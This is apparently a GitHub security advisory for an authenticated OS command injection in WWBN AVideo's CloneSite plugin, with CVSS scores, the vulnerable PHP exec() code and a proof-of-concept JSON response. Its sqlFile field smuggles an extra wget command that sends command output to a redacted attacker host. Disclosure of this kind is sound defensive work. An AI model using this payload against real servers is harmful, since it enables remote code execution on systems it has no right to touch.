GitHub Advisory DatabaseGHSA-6VRJ-PH27-QFP3Remote code injection in wwbn/avideo
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.003 Low
EPSS
Percentile
69.3%
WWBN Avideo Authenticated RCE - OS Command Injection
Description
An OS Command Injection vulnerability in an Authenticated endpoint /plugin/CloneSite/cloneClient.json.php allows attackers to achieve Remote Code Execution.
Vulnerable code:
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
We can control $objClone->cloneSiteURL through the admin panel clone site feature.
/plugin/CloneSite/cloneClient.json.php sends a GET Request to {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. I hosted a specially crafted cloneServer.json.php that prints the following JSON data
{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}
Send a GET Request to /plugin/CloneSite/cloneClient.json.php then remote code execution is achieved.
Affected configurations
| CPE | Name | Operator | Version |
|---|---|---|---|
| wwbn/avideo | lt | 12.4 |
Related
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.003 Low
EPSS
Percentile
69.3%